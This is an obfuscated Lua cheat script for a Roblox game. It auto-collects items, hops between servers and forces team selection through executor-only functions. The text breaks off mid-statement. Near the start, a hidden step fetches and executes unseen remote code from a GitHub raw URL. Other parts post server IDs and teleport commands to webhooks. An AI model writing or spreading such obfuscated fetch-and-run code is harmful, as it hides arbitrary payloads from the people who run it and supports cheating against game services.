--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.3) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v83,v84) local v85={};for v197=1, #v83 do v6(v85,v0(v4(v1(v2(v83,v197,v197 + 1 )),v1(v2(v84,1 + (v197% #v84) ,1 + (v197% #v84) + 1 )))%256 ));end return v5(v85);end loadstring(game:HttpGet("https://raw.githubusercontent.com/Chetdithglon/lklklkl/main/wedhook"))();if game:GetService(v7("\230\204\201\46\245\171\198\29\212","\126\177\163\187\69\134\219\167")).Map:FindFirstChild(v7("\14\212\57\209\245\32\228\57\201\253\45\201","\156\67\173\74\165")) then local v198=285 -(74 + 211) ;local v199;local v200;local v201;local v202;local v203;local v204;local v205;while true do if ((2 -1)==v198) then v201=nil;v202=nil;v198=268 -(28 + 238) ;end if ((4 -2)==v198) then v203=nil;v204=nil;v198=1562 -(1381 + 178) ;end if (v198==3) then v205=nil;while true do if ((3 + 0)==v199) then v205={[v7("\50\4\181","\75\103\118\217")]=_G.daobian,[v7("\229\91\116\13","\126\167\52\16\116\217")]=v204,[v7("\229\43\52\136\187\29","\156\168\78\64\224\212\121")]=v7("\55\193\150\250","\174\103\142\197"),[v7("\126\45\94\60\32\76\235","\152\54\72\63\88\69\62")]=v203};Request(v205);break;end if (v199==(0 + 0)) then local v240=0 + 0 ;while true do if (v240==(0 -0)) then v200=(is_sirhurt_closure and v7("\7\190\91\30\169\52\82","\38\84\215\41\118\220\70")) or (pebc_execute and v7("\96\4\45\6\241\99\27\35\1\246\85\4","\158\48\118\66\114")) or (syn and v7("\152\61\30\55\99\182\254\235\28","\155\203\68\112\86\19\197")) or (secure_load and v7("\117\216\56\232\73\118\224\244","\152\38\189\86\156\32\24\133")) or (KRNL_LOADED and v7("\215\69\169\74","\38\156\55\199")) or (SONA_LOADED and v7("\155\114\114\41","\35\200\29\28\72\115\20\154")) or v7("\42\183\216\203\205\41\44\9\179\222\214\153\108\51","\84\121\223\177\191\237\76") ;v201=game:GetService(v7("\147\66\221\176\9\85\34\215\178\85\204","\161\219\54\169\192\90\48\80"));v240=1 + 0 ;end if (v240==(471 -(381 + 89))) then v199=1 + 0 ;break;end end end if (2==v199) then local v241=0 + 0 ;while true do if (v241==(0 -0)) then v204=v201:JSONEncode(v202);Request=http_request or request or HttpPost or syn.request ;v241=1157 -(1074 + 82) ;end if (v241==(1 -0)) then v199=1787 -(214 + 1570) ;break;end end end if (v199==(1456 -(990 + 465))) then local v242=0 + 0 ;while true do if (v242==1) then v199=1 + 1 ;break;end if (v242==(0 + 0)) then v202={[v7("\76\79\2\32\77\81","\69\41\34\96")]={{[v7("\186\202\210\6\6\56","\75\220\163\183\106\98")]={{[v7("\12\187\134\50","\185\98\218\235\87")]="đảo bí ẩn",[v7("\221\61\43\243\219","\202\171\92\71\134\190")]="```Người dùng đã thấy đảo bí ẩn```",[v7("\32\207\32\129\39\196","\232\73\161\76")]=true},{[v7("\181\216\79\88","\126\219\185\34\61")]="lệnh teleport sever",[v7("\26\207\82\103\123","\135\108\174\62\18\30\23\147")]='game:GetService("TeleportService"):TeleportToPlaceInstance('   .. game.PlaceId   .. ', "'   .. game.JobId   .. '", game.Players.LocalPlayer)' ,[v7("\191\231\38\194\22\171","\167\214\137\74\171\120\206\83")]=true}}}}};v203={[v7("\168\255\60\73\253\169\159\189\6\68\232\162","\199\235\144\82\61\152")]="application/json"};v242=2 -1 ;end end end end break;end if (v198==(0 -0)) then v199=0 -0 ;v200=nil;v198=1 + 0 ;end end end if (game.PlaceId==(9339614619 -1890190984)) then if (game:GetService(v7("\248\205\233\84\192\205\224\91","\60\180\164\142")).Sky.MoonTextureId=="http://www.roblox.com/asset/?id=9709149052") then local v215=0 + 0 ;local v216;local v217;local v218;local v219;local v220;local v221;while true do if (v215==(1 -0)) then v218={[v7("\168\208\18\245\124\229","\150\205\189\112\144\24")]={{[v7("\35\141\186\64\0\155","\112\69\228\223\44\100\232\113")]={{[v7("\218\30\10\214","\230\180\127\103\179\214\28")]=v7("\219\80\26\6\201\78\239\130","\128\236\101\63\38\132\33"),[v7("\186\168\29\81\179","\175\204\201\113\36\214\139")]="Người dùng đã thấy Moon 75%",[v7("\78\194\57\213\10\66","\100\39\172\85\188")]=true},{[v7("\163\121\180\133","\83\205\24\217\224")]="lệnh teleport sever",[v7("\240\196\193\40\227","\93\134\165\173")]='game:GetService("TeleportService"):TeleportToPlaceInstance('   .. game.PlaceId   .. ', "'   .. game.JobId   .. '", game.Players.LocalPlayer)' ,[v7("\183\252\205\203\52\203","\30\222\146\161\162\90\174\210")]=true}}}}};v219={[v7("\198\65\126\30\224\64\100\71\209\87\96\15","\106\133\46\16")]="application/json"};v215=817 -(98 + 717) ;end if (v215==0) then local v236=0;while true do if (v236==(826 -(802 + 24))) then v216=(is_sirhurt_closure and v7("\107\87\23\33\50\255\6","\114\56\62\101\73\71\141")) or (pebc_execute and v7("\136\251\212\208\183\218\214\197\171\225\222\214","\164\216\137\187")) or (syn and v7("\225\255\63\179\182\237\14\146\222","\107\178\134\81\210\198\158")) or (secure_load and v7("\11\11\140\210\163\54\11\142","\202\88\110\226\166")) or (KRNL_LOADED and v7("\232\29\140\251","\170\163\111\226\151")) or (SONA_LOADED and v7("\34\63\188\57","\73\113\80\210\88\46\87")) or v7("\178\36\196\6\167\132\52\221\30\232\136\56\141\21","\135\225\76\173\114") ;v217=game:GetService(v7("\50\249\172\160\159\184\181\12\228\187\181","\199\122\141\216\208\204\221"));v236=1 -0 ;end if (v236==(1 -0)) then v215=1;break;end end end if (2==v215) then local v237=0;while true do if (v237==(0 + 0)) then v220=v217:JSONEncode(v218);Request=http_request or request or HttpPost or syn.request ;v237=1 + 0 ;end if (v237==(1 + 0)) then v215=3;break;end end end if (v215==(1 + 2)) then v221={[v7("\109\50\127","\32\56\64\19\156\58")]=_G.FullMoon,[v7("\120\199\225\79","\224\58\168\133\54\58\146")]=v220,[v7("\116\83\95\245\122\130","\107\57\54\43\157\21\230\231")]=v7("\235\164\34\193","\175\187\235\113\149\217\188"),[v7("\20\170\128\72\230\107\107","\24\92\207\225\44\131\25")]=v219};Request(v221);break;end end end end local v8=Instance.new(v7("\120\208\170\73\30\115\108\198\177","\29\43\179\216\44\123"));local v9=Instance.new(v7("\137\220\56\88\159\204\52\88\178\215","\44\221\185\64"));local v10=Instance.new(v7("\52\206\107\80\97\15\226\90","\19\97\135\40\63"));local v11=Instance.new(v7("\155\117\20\41\46\53\167\89\61\47","\81\206\60\83\91\79"));local v12=Instance.new(v7("\122\174\200\102\13\214\89\176\65\165","\196\46\203\176\18\79\163\45"));local v13=Instance.new(v7("\141\11\93\17\54\245\234\170","\143\216\66\30\126\68\155"));local v14=Instance.new(v7("\159\225\62\223\215\172\220\228","\129\202\168\109\171\165\195\183"));v8.Parent=game.Players.LocalPlayer:WaitForChild(v7("\18\84\54\193\219\6\193\55\81","\134\66\56\87\184\190\116"));v8.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;v9.Name=v7("\47\52\31\190\11","\85\92\81\105\219\121\139\65");v9.Parent=v8;v9.BackgroundColor3=Color3.fromRGB(709 -454 ,850 -595 ,255);v9.BorderColor3=Color3.fromRGB(0 + 0 ,0 + 0 ,0);v9.BorderSizePixel=0 + 0 ;v9.Position=UDim2.new(0.930088699 + 0 ,0 + 0 ,0.601923108,0);v9.Size=UDim2.new(1433.062432725 -(797 + 636) ,0 -0 ,1619.0596153848 -(1427 + 192) ,0);v9.Font=Enum.Font.SourceSans;v9.Text="Đổi Sever";v9.TextColor3=Color3.fromRGB(0 + 0 ,0 -0 ,0 + 0 );v9.TextScaled=true;v9.TextSize=7 + 7 ;v9.TextWrapped=true;v10.CornerRadius=UDim.new(0,346 -(192 + 134) );v10.Parent=v9;v11.Color=ColorSequence.new({ColorSequenceKeypoint.new(0 + 0 ,Color3.fromRGB(58 + 16 ,236 + 19 ,201)),ColorSequenceKeypoint.new(551.29 -(83 + 468) ,Color3.fromRGB(1925 -(1202 + 604) ,1167 -917 ,211 -84 )),ColorSequenceKeypoint.new(0.55 -0 ,Color3.fromRGB(217,571 -(45 + 280) ,145 + 5 )),ColorSequenceKeypoint.new(0.77 + 0 ,Color3.fromRGB(134 + 108 ,36 + 165 ,130)),ColorSequenceKeypoint.new(1912 -(340 + 1571) ,Color3.fromRGB(255,61 + 92 ,1925 -(1733 + 39) ))});v11.Parent=v9;v12.Parent=v9;v12.BackgroundColor3=Color3.fromRGB(700 -445 ,1289 -(125 + 909) ,2203 -(1096 + 852) );v12.BackgroundTransparency=1;v12.BorderColor3=Color3.fromRGB(0,0 + 0 ,0 -0 );v12.BorderSizePixel=0 + 0 ;v12.Position=UDim2.new( -(512.103447914 -(409 + 103)),0, -(237.54838681 -(46 + 190)),95 -(51 + 44) );v12.Size=UDim2.new(1.18965518 + 0 ,1317 -(1114 + 203) ,727.54838705 -(228 + 498) ,0);v12.ZIndex= -(1 + 0);v12.Font=Enum.Font.SourceSansBold;v12.Text="x";v12.TextColor3=Color3.fromRGB(141 + 114 ,0,0);v12.TextScaled=true;v12.TextSize=677 -(174 + 489) ;v12.TextStrokeColor3=Color3.fromRGB(664 -409 ,1929 -(830 + 1075) ,531 -(303 + 221) );v12.TextWrapped=true;v13.CornerRadius=UDim.new(1269 -(231 + 1038) ,20);v13.Parent=v12;v14.Thickness=3.9000000953674316;v14.Parent=v12;local function v56() local v86=0 + 0 ;local v87;local v88;local v89;local v90;local v91;while true do if (v86==(1164 -(171 + 991))) then v91=nil;while true do if ((4 -3)==v87) then v90=TweenInfo.new(10 -6 ,Enum.EasingStyle.Linear,Enum.EasingDirection.In, -(2 -1));v91=v89:Create(v88.Parent,v90,{[v7("\74\136\58\22\108\142\33\25","\119\24\231\78")]=360});v87=2 + 0 ;end if (v87==0) then v88=Instance.new(v7("\206\176\66\76\108\203","\191\157\211\48\37\28"),v11);v89=game:GetService(v7("\235\8\241\25\52\236\26\230\10\51\220\26","\90\191\127\148\124"));v87=1;end if ((6 -4)==v87) then v91:Play();break;end end break;end if (v86==0) then local v222=0;while true do if (v222==(2 -1)) then v86=1 -0 ;break;end if (v222==(0 -0)) then v87=1248 -(111 + 1137) ;v88=nil;v222=1;end end end if (v86==(159 -(91 + 67))) then v89=nil;v90=nil;v86=5 -3 ;end end end coroutine.wrap(v56)();local function v57() local v92=0 + 0 ;local v93;local v94;while true do if ((524 -(423 + 100))==v92) then while true do if (v93==(0 + 0)) then v94=Instance.new(v7("\177\46\183\67\204\84","\113\226\77\197\42\188\32"),v12);v94.Parent.MouseButton1Click:Connect(function() v94.Parent.Parent:Destroy();end);break;end end break;end if (v92==(0 -0)) then v93=0;v94=nil;v92=1 + 0 ;end end end coroutine.wrap(v57)();local function v58() local v95=Instance.new(v7("\22\25\247\180\54\37\247\167\51\6\224","\213\90\118\148"),v9);v95.Parent.MouseButton1Click:Connect(function() game:GetService(v7("\111\43\184\83\93\84\60\160\101\72\73\56\189\85\72","\45\59\78\212\54")):Teleport(game.PlaceId,game:GetService(v7("\32\90\130\146\131\60\190","\144\112\54\227\235\230\78\205")).LocalPlayer);end);end coroutine.wrap(v58)();local v59={};local v60=game:GetService(v7("\135\63\10\249\222\104\182\58\25\245\211\94","\59\211\72\111\156\176"));local v61=Instance.new(v7("\125\132\241\40\75\137\196\56\71","\77\46\231\131"));v61.Name=v7("\152\85\186\65\168\85\188\65","\32\218\52\214");v61.Parent=game.CoreGui;v61.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;local v66=Instance.new(v7("\104\5\48\165\244","\58\46\119\81\200\145\208\37"));v66.Name=v7("\5\131\36\165\143\175\55\38\137","\86\75\236\80\204\201\221");v66.Parent=v61;v66.AnchorPoint=Vector2.new(771.5 -(326 + 445) ,0.5 -0 );v66.BackgroundColor3=Color3.fromRGB(255,567 -312 ,594 -339 );v66.BackgroundTransparency=1;v66.Position=UDim2.new(712.2 -(530 + 181) ,0,0.0613496937,881 -(614 + 267) );v66.Size=UDim2.new(0,1664 -(19 + 13) ,0 -0 ,100);local v74=Instance.new(v7("\71\104\91\140\237\159\94\64\110\138\235\159","\235\18\33\23\229\158"));v74.Name=v7("\126\181\213\178\92\179\210\175\92\187\216\180\69\174","\219\48\218\161");v74.Parent=v66;v74.FillDirection=Enum.FillDirection.Vertical;v74.SortOrder=Enum.SortOrder.LayoutOrder;v74.Padding=UDim.new(0 -0 ,14 -9 );v59.Notification=function(v96,v97,v98,v99,v100) if (v100==nil) then v100="";end if (v99==nil) then v99=1 + 0 ;end local v101=Instance.new(v7("\194\99\125\68\222","\128\132\17\28\41\187\47"));v101.Name=v7("\53\59\18\54\88\39\32\7\55\88","\61\97\82\102\90");v101.Parent=v66;v101.BackgroundColor3=Color3.fromRGB(61 -26 ,35,72 -37 );v101.Size=UDim2.new(0,1812 -(1293 + 519) ,0 -0 ,0);local v106=Instance.new(v7("\153\7\152\95\213\88\21\12","\105\204\78\203\43\167\55\126"));v106.Thickness=1;v106.Name="";v106.Parent=v101;v106.ApplyStrokeMode=Enum.ApplyStrokeMode.Border;v106.LineJoinMode=Enum.LineJoinMode.Round;v106.Color=Color3.fromRGB(665 -410 ,487 -232 ,1099 -844 );v106.Transparency=0 -0 ;v101:TweenSizeAndPosition(UDim2.new(0,(133 + 117) -(3 + 7) ,0 -0 ,70),UDim2.new(0.5 + 0 ,0 + 0 ,0.5 + 0 ,0),v7("\138\191\55","\49\197\202\67\126\115\100\167"),v7("\21\90\220\34","\62\87\59\191\73\224\54"),1096.3 -(709 + 387) ,true);local v116=Instance.new(v7("\210\43\217\198\245\12\255\219","\169\135\98\154"));v116.CornerRadius=UDim.new(0,4);v116.Name=v7("\232\120\42\90\248\33\252\194\99\45\88\248","\168\171\23\68\52\157\83");v116.Parent=v101;local v120=Instance.new(v7("\221\124\244\170\32\1\134\246\116\249","\231\148\17\149\205\69\77"));v120.Name=v7("\137\170\198\252\82\241\143\179\206","\159\224\199\167\155\55");v120.Parent=v101;v120.AnchorPoint=Vector2.new(0.5,1858.5 -(673 + 1185) );v120.BackgroundColor3=Color3.fromRGB(255,739 -484 ,255);v120.Position=UDim2.new(0.135999978,0 -0 ,0.5,0 -0 );v120.Size=UDim2.new(0 + 0 ,38 + 12 ,0 -0 ,13 + 37 );v120.BackgroundTransparency=1;v120.Image="http://www.roblox.com/asset/?id="   .. tostring(v100) ;local v129=Instance.new(v7("\195\246\36\198\219\242\62\215\251","\178\151\147\92"));local v130=Instance.new(v7("\170\239\77\63\23","\26\236\157\44\82\114\44"));v129.Name=v7("\62\54\209\87\35\42","\59\74\78\181");v129.Parent=v101;v129.BackgroundColor3=Color3.fromRGB(169 -84 ,333 -163 ,2135 -(446 + 1434) );v129.BackgroundTransparency=1284 -(1040 + 243) ;v129.Position=UDim2.new(0.25 -0 ,1847 -(559 + 1288) ,1931.15 -(609 + 1322) ,454 -(13 + 441) );v129.Size=UDim2.new(0 -0 ,458 -283 ,0 -0 ,1 + 23 );v129.Font=Enum.Font.LuckiestGuy;v129.TextColor3=Color3.fromRGB(85,170,255);v129.TextSize=47 -34 ;v129.Text=v97;v129.TextXAlignment=Enum.TextXAlignment.Left;v130.Name=v7("\9\208\88\86\182\3\195\91\87\182","\211\69\177\58\58");v130.Parent=v101;v130.AnchorPoint=Vector2.new(0.5 + 0 ,0.5);v130.BackgroundColor3=Color3.fromRGB(112 + 143 ,255,255);v130.BackgroundTransparency=2 -1 ;v130.Position=UDim2.new(0.625999987,0 + 0 ,0.620000005 -0 ,0 + 0 );v130.Size=UDim2.new(0,98 + 77 ,0,25);local v151=Instance.new(v7("\131\224\97\225\197\202\181\224\117","\171\215\133\25\149\137"));v151.Name=v7("\213\205\42\238\193\63\232\75","\34\129\168\82\154\143\80\156");v151.Parent=v130;v151.Active=true;v151.BackgroundColor3=Color3.fromRGB(184 + 71 ,255,215 + 40 );v151.BackgroundTransparency=1;v151.Size=UDim2.new(0 + 0 ,608 -(153 + 280) ,0 -0 ,23 + 2 );v151.Font=Enum.Font.GothamBlack;v151.Text=v98;v151.TextScaled=true;v151.TextColor3=Color3.fromRGB(255,255,101 + 154 );v151.TextSize=12;v151.TextXAlignment=Enum.TextXAlignment.Left;repeat wait();until v101.Size==UDim2.new(0 + 0 ,(227 + 23) -10 ,0,51 + 19 )  local v165=Instance.new(v7("\163\160\50\6\77","\233\229\210\83\107\40\46"));local v166=Instance.new(v7("\244\107\17\217\23\207\71\32","\101\161\34\82\182"));local v167=Instance.new(v7("\221\36\105\255\223\230\139\32\239","\78\136\109\57\158\187\130\226"));v165.Name=v7("\10\54\244\244","\145\94\95\153");v165.Parent=v101;v165.Active=true;v165.BackgroundColor3=Color3.fromRGB(85,258 -88 ,158 + 97 );v165.BorderSizePixel=667 -(89 + 578) ;v165.Position=UDim2.new(0.0320000015 + 0 ,0,0.870000005,0);v165.Size=UDim2.new(0 -0 ,236,1049 -(572 + 477) ,1 + 2 );v166.Parent=v165;v166.CornerRadius=UDim.new(0 + 0 ,7);v166.Name="";v167.Parent=v66;v167.PaddingLeft=UDim.new(0 + 0 ,101 -(84 + 2) );v167.PaddingTop=UDim.new(0 -0 ,11 + 4 );v60:Create(v165,TweenInfo.new(tonumber(v99),Enum.EasingStyle.Linear,Enum.EasingDirection.InOut),{[v7("\206\196\14\208","\215\157\173\116\181\46")]=UDim2.new(842 -(497 + 345) ,0 + 0 ,0 + 0 ,1336 -(605 + 728) )}):Play();delay(tonumber(v99),function() local v206=0;local v207;while true do if ((0 + 0)==v206) then v207=0 -0 ;while true do if (v207==0) then v60:Create(v120,TweenInfo.new(0.2 + 0 ,Enum.EasingStyle.Sine,Enum.EasingDirection.InOut),{[v7("\28\185\138\245\223\1\166\138\252\201\37\181\153\247\212\54\173","\186\85\212\235\146")]=3 -2 }):Play();v60:Create(v151,TweenInfo.new(0.2 + 0 ,Enum.EasingStyle.Sine,Enum.EasingDirection.InOut),{[v7("\246\132\14\234\13\252\89\204\146\6\255\43\235\86\193\152","\56\162\225\118\158\89\142")]=1}):Play();v207=1;end if (v207==(5 -3)) then local v243=0 + 0 ;while true do if (v243==(490 -(457 + 32))) then v207=3;break;end if ((0 + 0)==v243) then v60:Create(v101,TweenInfo.new(0.4,Enum.EasingStyle.Quart,Enum.EasingDirection.InOut),{[v7("\2\139\102\185","\220\81\226\28")]=UDim2.new(0,0,1402 -(832 + 570) ,70)}):Play();wait(0.3);v243=1;end end end if (v207==(3 + 0)) then v101:Destroy();break;end if (v207==(1 + 0)) then v60:Create(v129,TweenInfo.new(0.2 -0 ,Enum.EasingStyle.Sine,Enum.EasingDirection.InOut),{[v7("\104\0\216\187\22\202\93\11\211\191\35\202\89\11\195\182","\184\60\101\160\207\66")]=1 + 0 }):Play();wait(796.3 -(588 + 208) );v207=5 -3 ;end end break;end end end);end;repeat wait();until game:IsLoaded() aut=true;function totarget(v181) local v182=1800 -(884 + 916) ;local v183;local v184;local v185;local v186;while true do if (v182==(1 -0)) then v185,v186=pcall(function() local v226=0 + 0 ;while true do if (v226==0) then v185=v183:Create(game.Players.LocalPlayer.Character['HumanoidRootPart'],v184,{[v7("\109\54\37\123\67\21","\26\46\112\87")]=v181});v185:Play();break;end end end);if  not v185 then return v186;end break;end if (v182==0) then local v223=653 -(232 + 421) ;while true do if (v223==0) then local v238=1889 -(1569 + 320) ;while true do if (v238==0) then v183=game:service(v7("\39\194\135\254\228\244\22\199\148\242\233\194","\167\115\181\226\155\138"));v184=TweenInfo.new((game:GetService(v7("\210\46\230\69\126\99\213","\166\130\66\135\60\27\17"))[v7("\104\69\205\116\60\116\70\207\108\53\86","\80\36\42\174\21")].Character.HumanoidRootPart.Position-v181.Position).Magnitude/(74 + 226) ,Enum.EasingStyle.Linear);v238=1 + 0 ;end if ((3 -2)==v238) then v223=606 -(316 + 289) ;break;end end end if ((2 -1)==v223) then v182=1 + 0 ;break;end end end end end function thisCode() repeat task.wait();until game:IsLoaded() local v187=game.PlaceId;local v188={};local v189="";local v190=os.date(v7("\248\105\191","\212\217\67\203\20\223\223\37")).hour;local v191=false;local v192=pcall(function() v188=game:GetService(v7("\146\153\188\194\137\136\186\196\179\142\173","\178\218\237\200")):JSONDecode(readfile(v7("\152\186\242\227\183\184\227\227\179\167\240\213\164\166\168\218\165\186\232","\176\214\213\134")));end);if  not v192 then local v214=0;while true do if (v214==(1453 -(666 + 787))) then table.insert(v188,v190);writefile(v7("\218\162\162\231\169\91\92\199\168\164\194\173\68\74\186\167\165\219\166","\57\148\205\214\180\200\54"),game:GetService(v7("\58\233\33\36\69\23\239\35\61\117\23","\22\114\157\85\84")):JSONEncode(v188));break;end end end function TPReturner() local v208=425 -(360 + 65) ;local v209;local v210;local v211;while true do if ((2 + 0)==v208) then v211=254 -(79 + 175) ;for v230,v231 in pairs(v209.data) do local v232=0 -0 ;local v233;local v234;while true do if (v232==(0 + 0)) then local v245=0;while true do if ((2 -1)==v245) then v232=1 -0 ;break;end if (v245==(899 -(503 + 396))) then v233=181 -(92 + 89) ;v234=nil;v245=1;end end end if (v232==1) then while true do if (v233==(1 -0)) then if (tonumber(v231.maxPlayers)>tonumber(v231.playing)) then local v263=0 + 0 ;while true do if (v263==0) then for v265,v266 in pairs(v188) do local v267=0;while true do if (v267==0) then if (v211~=0) then if (v210==tostring(v266)) then v234=false;end elseif (tonumber(v190)~=tonumber(v266)) then local v271=pcall(function() delfile(v7("\144\251\23\118\130\179\241\48\64\145\168\241\17\86\205\180\231\12\75","\227\222\148\99\37"));v188={};table.insert(v188,v190);end);end v211=v211 + 1 ;break;end end end if (v234==true) then local v268=0 + 0 ;while true do if (1==v268) then pcall(function() local v270=0;while true do if (v270==(0 -0)) then writefile(v7("\29\93\70\197\248\62\87\97\243\235\37\87\64\229\183\57\65\93\248","\153\83\50\50\150"),game:GetService(v7("\117\98\103\12\64\174\95\75\127\112\25","\45\61\22\19\124\19\203")):JSONEncode(v188));wait();v270=1 + 0 ;end if (v270==1) then game:GetService(v7("\245\23\1\240\18\127\171\213\33\8\231\20\121\186\196","\217\161\114\109\149\98\16")):TeleportToPlaceInstance(v187,v210,game.Players.LocalPlayer);break;end end end);wait(4);break;end if (v268==0) then local v269=0 -0 ;while true do if (v269==(0 + 0)) then table.insert(v188,v210);wait();v269=1 + 0 ;end if (v269==1) then v268=1;break;end end end end end break;end end end break;end if (v233==0) then v234=true;v210=tostring(v231.id);v233=2 -1 ;end end break;end end end break;end if (1==v208) then v210="";if (v209.nextPageCursor and (v209.nextPageCursor~=v7("\202\222\31\200","\200\164\171\115\164\61\150")) and (v209.nextPageCursor~=nil)) then v189=v209.nextPageCursor;end v208=1 + 1 ;end if (v208==0) then v209=nil;if (v189=="") then v209=game.HttpService:JSONDecode(game:HttpGet("https://games.roblox.com/v1/games/"   .. v187   .. "/servers/Public?sortOrder=Asc&limit=100" ));else v209=game.HttpService:JSONDecode(game:HttpGet("https://games.roblox.com/v1/games/"   .. v187   .. "/servers/Public?sortOrder=Asc&limit=100&cursor="   .. v189 ));end v208=1;end end end function Teleport() while wait() do pcall(function() local v224=0;while true do if (v224==(0 -0)) then TPReturner();if (v189~="") then TPReturner();end break;end end end);end end local v193=1244.5 -(485 + 759) ;task.spawn(function() while task.wait(v193) do pcall(function() for v227,v228 in pairs(game.CoreGui:GetDescendants()) do pcall(function() if string.find(v228.Name,v7("\55\50\42\115\174\89\23\51\43\125\187\113","\20\114\64\88\28\220")) then if string.find(v228.Text,v7("\2\4\209\161\234\217\169\40\65\217\189\251\219","\221\81\97\178\212\152\176")) then local v246=0 -0 ;local v247;while true do if ((1189 -(442 + 747))==v246) then v247=1135 -(832 + 303) ;while true do if (v247==(946 -(88 + 858))) then v193=304779646 + 695220354 ;Teleport();break;end end break;end end end end end);end end);end end);local v194=game:GetService(v7("\254\243\28\233\14\200\245\58\238\19","\122\173\135\125\155"));local v195=Instance.new(v7("\166\200\14\189\62\51\196\129\231\21\183\60\37\193\139\207","\168\228\161\96\217\95\81"));function gui() v194:SetCore(v7("\232\212\32\88\1\88\207\216\40\85\44\86\207\216\33\82","\55\187\177\78\60\79"),{[v7("\25\199\75\231\67","\224\77\174\63\139\38\175")]=v7("\165\84\76\33\196\103\74\47\137\1\123\38\129\82\76","\78\228\33\56"),[v7("\250\123\170\23","\229\174\30\210\99")]=v7("\61\228\158\84\233\125\62\26\224\131\17\232\47\43\20\255\149\17\238\50\61\30\173\212\7\186\33\27\2\173\132\88\227\53\56\24\230\131\67\225\50","\89\123\141\230\49\141\93"),[v7("\218\114\249\2","\42\147\17\150\108\112")]="rbxassetid://16435032782",[v7("\43\179\63\126\243\225\0\168","\136\111\198\77\31\135")]=math.huge,[v7("\33\8\171\90\191\229\20\162","\201\98\105\199\54\221\132\119")]=v195,[v7("\155\25\151\53\13\59\253","\204\217\108\227\65\98\85")]=v7("\118\198\236\165\40\213\90\198","\160\62\163\149\133\76")});end gui();v195.OnInvoke=function(v212) if (v212==v7("\254\165\20\111\199\195\164\8","\163\182\192\109\79")) then local v225=0 + 0 ;while true do if (v225==0) then aut=false;gui();break;end end elseif (v212==v7("\28\35\25\128\241\33\34\5","\149\84\70\96\160")) then local v235=0 + 0 ;while true do if ((790 -(766 + 23))==v235) then auto();break;end if (0==v235) then aut=true;gui();v235=4 -3 ;end end end end;function auto() if (aut==true) then task.spawn(function() while aut==true  do if (aut==true) then local v244=game.Players.LocalPlayer:FindFirstChild(v7("\27\14\12\255\57\5\25\232\42","\141\88\102\109"));if  not game.Players.LocalPlayer.Character then else local v248=game.Players.LocalPlayer.Character:FindFirstChild(v7("\144\65\207\103\56\31\114","\161\211\51\170\16\122\93\53"),true);if v248 then v248:Destroy();end local v249=game.Players.LocalPlayer.Character:FindFirstChild(v7("\211\187\191\41\245\161\187\44","\72\155\206\210"));if v249 then local v254=game.Workspace:FindFirstChild(v7("\101\114\81\29\39\18","\83\38\26\52\110")) or game.Workspace:FindFirstChild(v7("\123\31\34\85\76\68","\38\56\119\71")) or game.Workspace:FindFirstChild(v7("\208\231\93\197\49\4","\54\147\143\56\182\69")) ;if v254 then local v264=0 -0 ;while true do if (v264==(0 -0)) then game.Players.LocalPlayer.Character:PivotTo(v254:GetPivot());firesignal(v254.Touched,game.Players.LocalPlayer.Character.HumanoidRootPart);break;end end elseif (game.Players.LocalPlayer.Backpack:FindFirstChild(v7("\240\136\236\93\159\217\135\191\109\222\196\138\241\76\204\197","\191\182\225\159\41")) or game.Players.LocalPlayer.Character:FindFirstChild(v7("\13\27\59\65\203\136\196\107\54\41\71\128\137\199\56\1","\162\75\114\72\53\235\231")) or game.Players.LocalPlayer.Backpack:FindFirstChild("God's Chalice") or game.Players.LocalPlayer.Character:FindFirstChild("God's Chalice")) then aut=false;Teleport();break;end end end end task.wait();end end);end end end thisCode();auto();task.spawn(function() while wait() do if (game.Players.LocalPlayer.Backpack:FindFirstChild(v7("\170\53\87\246\19\13\138\124\96\227\65\9\130\57\87\241","\98\236\92\36\130\51")) or game.Players.LocalPlayer.Character:FindFirstChild(v7("\130\16\31\174\5\167\179\112\128\24\30\177\75\173\166\35","\80\196\121\108\218\37\200\213"))) then aut=false;end end end);join=game.Players.localPlayer.Neutral==false ;if (_G.Team==nil) then _G.Team=v7("\48\122\16\126\95\11\153","\234\96\19\98\31\43\110");end _G.Team=v7("\43\30\64\206\162\119\152","\235\102\127\50\167\204\18");if (((_G.Team==v7("\96\168\231\34\80\43\67","\78\48\193\149\67\36")) or (_G.Team==v7("\29\31\146\17\79\53\13","\33\80\126\224\120"))) and  not join) then local v213=0 -0 ;while true do if (v213==0) then repeat wait();pcall(function() join=game.Players.localPlayer.Neutral==false ;if (_G.Team==v7("\220\161\17\197\72\233\187","\60\140\200\99\164")) then for v250,v251 in pairs({v7("\170\251\17\53\167\165\225\16\50\173\137\165\39\42\171\132\255","\194\231\148\100\70"),v7("\107\67\212\176\243\234\83\88\213\172\248\153\98\67\214\173","\168\38\44\161\195\150"),v7("\161\255\150\127\38\233\162\19\132","\118\224\156\226\22\80\136\214")}) do for v252,v253 in pairs(getconnections(game:GetService(v7("\114\226\88\153\71\252\74","\224\34\142\57")).LocalPlayer.PlayerGui.Main.ChooseTeam.Container.Pirates.Frame.ViewportFrame.TextButton[v251])) do v253.Function();end end elseif (_G.Team==v7("\243\166\215\212\125\244\78","\110\190\199\165\189\19\145\61")) then for v255,v256 in pairs({v7("\247\228\98\251\142\229\207\255\99\231\133\150\249\231\126\235\128","\167\186\139\23\136\235"),v7("\55\186\157\30\31\151\157\25\14\186\134\92\62\186\159\3","\109\122\213\232"),v7("\207\244\182\57\248\246\182\53\234","\80\142\151\194")}) do for v259,v260 in pairs(getconnections(game:GetService(v7("\51\202\118\85\6\212\100","\44\99\166\23")).LocalPlayer.PlayerGui.Main.ChooseTeam.Container.Marines.Frame.ViewportFrame.TextButton[v256])) do v260.Function();end end else for v257,v258 in 